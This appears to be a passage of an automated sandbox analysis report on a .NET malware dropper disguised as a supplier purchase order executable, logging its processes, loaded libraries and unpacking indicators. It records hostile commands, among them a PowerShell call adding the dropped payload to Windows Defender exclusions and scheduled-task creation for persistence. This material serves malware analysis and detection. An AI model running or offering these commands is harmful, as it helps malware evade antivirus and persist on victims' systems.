                      Source: Supplier Purchase Order - PO0002491.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: Supplier Purchase Order - PO0002491.exeReversingLabs: Detection: 73%
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeFile read: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe "C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe"
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\keHuNxIumw.exe"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\keHuNxIumw" /XML "C:\Users\user\AppData\Local\Temp\tmp9421.tmp"
                      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeProcess created: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe "C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe"
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\keHuNxIumw.exe C:\Users\user\AppData\Roaming\keHuNxIumw.exe
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\keHuNxIumw" /XML "C:\Users\user\AppData\Local\Temp\tmpB43C.tmp"
                      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeProcess created: C:\Users\user\AppData\Roaming\keHuNxIumw.exe "C:\Users\user\AppData\Roaming\keHuNxIumw.exe"
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\keHuNxIumw.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\keHuNxIumw" /XML "C:\Users\user\AppData\Local\Temp\tmp9421.tmp"Jump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeProcess created: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe "C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\keHuNxIumw" /XML "C:\Users\user\AppData\Local\Temp\tmpB43C.tmp"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeProcess created: C:\Users\user\AppData\Roaming\keHuNxIumw.exe "C:\Users\user\AppData\Roaming\keHuNxIumw.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeSection loaded: dwrite.dllJump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeSection loaded: rstrtmgr.dllJump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeSection loaded: dwrite.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeSection loaded: rstrtmgr.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: Supplier Purchase Order - PO0002491.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: Supplier Purchase Order - PO0002491.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Supplier Purchase Order - PO0002491.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: ldPH.pdb source: Supplier Purchase Order - PO0002491.exe, keHuNxIumw.exe.0.dr
                      Source: Binary string: ldPH.pdbSHA256 source: Supplier Purchase Order - PO0002491.exe, keHuNxIumw.exe.0.dr

                      Data Obfuscation

                      barindex
                      .NET source code contains method to dynamically call methods (often used by packers)
                      Source: 0.2.Supplier Purchase Order - PO0002491.exe.7aa0000.3.raw.unpack, at4ONG9F0NYCELN5Tj.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{cPRyvIfYviaTKciquO(typeof(IntPtr).TypeHandle),cPRyvIfYviaTKciquO(typeof(Type).TypeHandle)})
                      .NET source code contains potential unpacker
                      Source: 0.2.Supplier Purchase Order - PO0002491.exe.453f850.1.raw.unpack, mqshXHrVQ97YMT4tEt.cs.Net Code: SatqKrZb18 System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.Supplier Purchase Order - PO0002491.exe.9850000.4.raw.unpack, mqshXHrVQ97YMT4tEt.cs.Net Code: SatqKrZb18 System.Reflection.Assembly.Load(byte[])
                      Source: Supplier Purchase Order - PO0002491.exeStatic PE information: 0xB86C7B99 [Wed Jan 18 13:01:13 2068 UTC]
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: 12_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,12_2_0041CBE1
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeCode function: 0_2_07BD6773 push esp; ret 0_2_07BD6779
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeCode function: 0_2_07BDB3B8 push eax; iretd 0_2_07BDB3B9
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeCode function: 0_2_07BD1168 pushfd ; iretd 0_2_07BD116A
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeCode function: 0_2_07BD116B pushfd ; iretd 0_2_07BD1172
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: 12_2_00457186 push ecx; ret 12_2_00457199
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: 12_2_0045E55D push esi; ret 12_2_0045E566
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: 12_2_00457AA8 push eax; ret 12_2_00457AC6
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: 12_2_00434EB6 push ecx; ret 12_2_00434EC9
                      Source: Supplier Purchase Order - PO0002491.exeStatic PE information: section name: .text entropy: 7.778713534955087
                      Source: keHuNxIumw.exe.0.drStatic PE information: section name: .text entropy: 7.778713534955087
                      Source: 0.2.Supplier Purchase Order - PO0002491.exe.453f850.1.raw.unpack, zThQNep4lwKpE9O0BC.csHigh entropy of concatenated method names: 'Dispose', 'IVvmVIIR1M', 'Mgyac1W0Ni', 'odZCCOH7n7', 'tmqmke9fTd', 'IOXmzWOSgt', 'ProcessDialogKey', 'KiDaowKvbu', 'J5wam7HO6p', 'EhAaalCU4s'
                      Source: 0.2.Supplier Purchase Order - PO0002491.exe.453f850.1.raw.unpack, yxWKBchUKSW06bE2hl.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'sL5aVpGmWE', 'E88akydsJv', 'D2ZazZa652', 'grEFot43Fo', 'HuCFmoLnNh', 'NqGFaemGDc', 'nmPFF1JFgj', 'lRlpJUbu05kK3ucJ2eT'
                      Source: 0.2.Supplier Purchase Order - PO0002491.exe.453f850.1.raw.unpack, jSRC5wmFTKLEbN6j3uU.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'E3QI1gbo2N', 'cBJIH5hZ68', 'vCAID9YLXY', 'WF7IXecOcY', 'Ew5IZjgmQX', 'dy2IOjm3KJ', 'NyaIG76mDc'
                      Source: 0.2.Supplier Purchase Order - PO0002491.exe.453f850.1.raw.unpack, iMftbjagvPfJN33VjN.csHigh entropy of concatenated method names: 'n7DKFjTcd', 'MQBgkVi0a', 'kjt2lIfSV', 'A6d7C0rQR', 'h2cuIApkO', 'OJHYAGyMw', 'qB7g6Rvopn3Fh7amJY', 'exSZfKGYpynCQmkJC4', 'dUr4G2dHd', 'Y8sI5EgbP'
                      Source: 0.2.Supplier Purchase Order - PO0002491.exe.453f850.1.raw.unpack, hp0xu9CEYuFdg9g0GR.csHigh entropy of concatenated method names: 'uHAN0Z89Li', 'w1pNpM6jW5', 'K0YNtltfjs', 'e5ENJb1olu', 'RwpNr3m8ak', 'nLBtZMs5Pu', 'whKtOcRkRB', 'rlitG6I5I2', 'bi1tyuZZMC', 'rGXtVQbxlw'
                      Source: 0.2.Supplier Purchase Order - PO0002491.exe.453f850.1.raw.unpack, aqe9fTydROXWOSgtfi.csHigh entropy of concatenated method names: 'uKI4Ttq2Ch', 'IEn4prwncB', 'i9P4hNexxl', 'sPN4tLbKWj', 'pNJ4NJjEN3', 'EHm4Jb0kB6', 'nH94rEtJdU', 'k7O4drI1y7', 'bqE48mhZMZ', 'F5U4lWH5UX'
                      Source: 0.2.Supplier Purchase Order - PO0002491.exe.453f850.1.raw.unpack, Pl9B1MLSEJ7M2ACnEo.csHigh entropy of concatenated method names: 'wwbJ99GRes', 'xjPJQYB2FZ', 'lNUJKw7CIM', 'E2UJgYmYfD', 'eVbJA8W6yd', 'JMKJ2PdaAm', 'vHuJ7tooSi', 'WxMJxRcO8o', 'ixPJuP0boK', 'Nt5JYbA1sl'
